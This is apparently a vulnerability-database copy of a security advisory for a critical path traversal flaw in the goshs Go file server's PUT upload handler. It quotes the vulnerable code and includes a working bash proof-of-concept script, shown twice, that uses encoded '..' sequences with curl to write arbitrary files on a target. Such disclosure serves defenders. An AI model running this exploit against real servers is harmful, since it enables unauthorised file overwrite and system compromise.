GHSA-G8MV-VP7J-QP64
Vulnerability from github – Published: 2026-04-03 04:07 – Updated: 2026-04-06 23:43
VLAI
Summary
goshs: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in goshs PUT Upload
Details
Summary
- PUT upload has no path sanitization |
httpserver/updown.go:20-69
This finding affects the default configuration, no flags or authentication required.
Details
File: httpserver/updown.go:20-69
Trigger: PUT /<path> (server.go:57-59 routes directly to put())
The handler uses req.URL.Path raw to build the save path. No filepath.Clean, no .. check, no webroot containment.
func (fs *FileServer) put(w http.ResponseWriter, req *http.Request) {
upath := req.URL.Path // unsanitized
filename := strings.Split(upath, "/")
outName := filename[len(filename)-1]
targetpath := strings.Split(upath, "/")
targetpath = targetpath[:len(targetpath)-1]
target := strings.Join(targetpath, "/")
savepath := fmt.Sprintf("%s%s/%s", fs.UploadFolder, target, outName)
// ...
os.Create(savepath) // arbitrary path write
UploadFolder defaults to Webroot (main.go:386-388). The path is pure string concatenation with no validation.
Impact: Unauthenticated arbitrary file write anywhere on the filesystem.
PoCs:
#!/usr/bin/env bash
# Write an arbitrary file on a running goshs instance via PUT.
#
# Usage: ./arbitrary_overwrite1.sh <host> <port> <local-file> <absolute-target-path>
set -euo pipefail
HOST="${1:?Usage: $0 <host> <port> <local-file> <absolute-target-path>}"
PORT="${2:?Usage: $0 <host> <port> <local-file> <absolute-target-path>}"
LOCAL_FILE="${3:?Usage: $0 <host> <port> <local-file> <absolute-target-path>}"
TARGET="${4:?Usage: $0 <host> <port> <local-file> <absolute-target-path>}"
if [ ! -f "$LOCAL_FILE" ]; then
echo "[-] Local file not found: $LOCAL_FILE"
exit 1
fi
# 16 levels of %2e%2e/ (URL-encoded "..") to reach filesystem root.
# Encoding is required so curl does not resolve the traversal client-side.
TRAVERSAL=""
for _ in $(seq 1 16); do
TRAVERSAL="${TRAVERSAL}%2e%2e/"
done
# Strip leading / from target
TARGET_REL="${TARGET#/}"
PUT_PATH="/${TRAVERSAL}${TARGET_REL}"
echo "[*] Source: ${LOCAL_FILE}"
echo "[*] Target: ${TARGET}"
echo "[*] PUT: ${PUT_PATH}"
echo ""
HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" \
--path-as-is \
-X PUT --data-binary "@${LOCAL_FILE}" \
"http://${HOST}:${PORT}${PUT_PATH}")
echo "[*] HTTP ${HTTP_CODE}"
echo "[*] File should now exist at ${TARGET} on the target."
To execute it: ./arbitrary_overwrite2.sh 10.1.2.2 8000 ./canary /tmp/can
Recommendations
Checking that the targeted file is part of the webroot could prevent these attacks. Also, ensure that the method return is called after every error response.
Severity
9.8 (Critical)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/patrickhener/goshs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.1.5-0.20260401172448-237f3af891a9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-35392"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-03T04:07:55Z",
"nvd_published_at": "2026-04-06T21:16:21Z",
"severity": "CRITICAL"
},
"details": "### Summary\n* PUT upload has no path sanitization | `httpserver/updown.go:20-69`\n\nThis finding affects the default configuration, no flags or authentication required.\n\n### Details\n\n**File:** `httpserver/updown.go:20-69`\n**Trigger:** `PUT /\u003cpath\u003e` (server.go:57-59 routes directly to `put()`)\n\nThe handler uses `req.URL.Path` raw to build the save path. No `filepath.Clean`, no `..` check, no webroot containment.\n\n```go\nfunc (fs *FileServer) put(w http.ResponseWriter, req *http.Request) {\n upath := req.URL.Path // unsanitized\n\n filename := strings.Split(upath, \"/\")\n outName := filename[len(filename)-1]\n\n targetpath := strings.Split(upath, \"/\")\n targetpath = targetpath[:len(targetpath)-1]\n target := strings.Join(targetpath, \"/\")\n\n savepath := fmt.Sprintf(\"%s%s/%s\", fs.UploadFolder, target, outName)\n // ...\n os.Create(savepath) // arbitrary path write\n```\n\n`UploadFolder` defaults to `Webroot` (main.go:386-388). The path is pure string concatenation with no validation.\n\n**Impact:** Unauthenticated arbitrary file write anywhere on the filesystem.\n\n**PoCs:**\n```bash\n#!/usr/bin/env bash\n# Write an arbitrary file on a running goshs instance via PUT.\n#\n# Usage: ./arbitrary_overwrite1.sh \u003chost\u003e \u003cport\u003e \u003clocal-file\u003e \u003cabsolute-target-path\u003e\n\nset -euo pipefail\n\nHOST=\"${1:?Usage: $0 \u003chost\u003e \u003cport\u003e \u003clocal-file\u003e \u003cabsolute-target-path\u003e}\"\nPORT=\"${2:?Usage: $0 \u003chost\u003e \u003cport\u003e \u003clocal-file\u003e \u003cabsolute-target-path\u003e}\"\nLOCAL_FILE=\"${3:?Usage: $0 \u003chost\u003e \u003cport\u003e \u003clocal-file\u003e \u003cabsolute-target-path\u003e}\"\nTARGET=\"${4:?Usage: $0 \u003chost\u003e \u003cport\u003e \u003clocal-file\u003e \u003cabsolute-target-path\u003e}\"\n\nif [ ! -f \"$LOCAL_FILE\" ]; then\n echo \"[-] Local file not found: $LOCAL_FILE\"\n exit 1\nfi\n\n# 16 levels of %2e%2e/ (URL-encoded \"..\") to reach filesystem root.\n# Encoding is required so curl does not resolve the traversal client-side.\nTRAVERSAL=\"\"\nfor _ in $(seq 1 16); do\n TRAVERSAL=\"${TRAVERSAL}%2e%2e/\"\ndone\n\n# Strip leading / from target\nTARGET_REL=\"${TARGET#/}\"\n\nPUT_PATH=\"/${TRAVERSAL}${TARGET_REL}\"\n\necho \"[*] Source: ${LOCAL_FILE}\"\necho \"[*] Target: ${TARGET}\"\necho \"[*] PUT: ${PUT_PATH}\"\necho \"\"\n\nHTTP_CODE=$(curl -s -o /dev/null -w \"%{http_code}\" \\\n --path-as-is \\\n -X PUT --data-binary \"@${LOCAL_FILE}\" \\\n \"http://${HOST}:${PORT}${PUT_PATH}\")\n\necho \"[*] HTTP ${HTTP_CODE}\"\necho \"[*] File should now exist at ${TARGET} on the target.\"\n```\n\nTo execute it: `./arbitrary_overwrite2.sh 10.1.2.2 8000 ./canary /tmp/can`\n\n## Recommendations\n\nChecking that the targeted file is part of the webroot could prevent these attacks. Also, ensure that the method `return` is called after every error response.",
"id": "GHSA-g8mv-vp7j-qp64",
"modified": "2026-04-06T23:43:45Z",
"published": "2026-04-03T04:07:55Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-g8mv-vp7j-qp64"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35392"
},
{
"type": "PACKAGE",
"url": "https://github.com/patrickhener/goshs"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "goshs: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027) in goshs PUT Upload"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…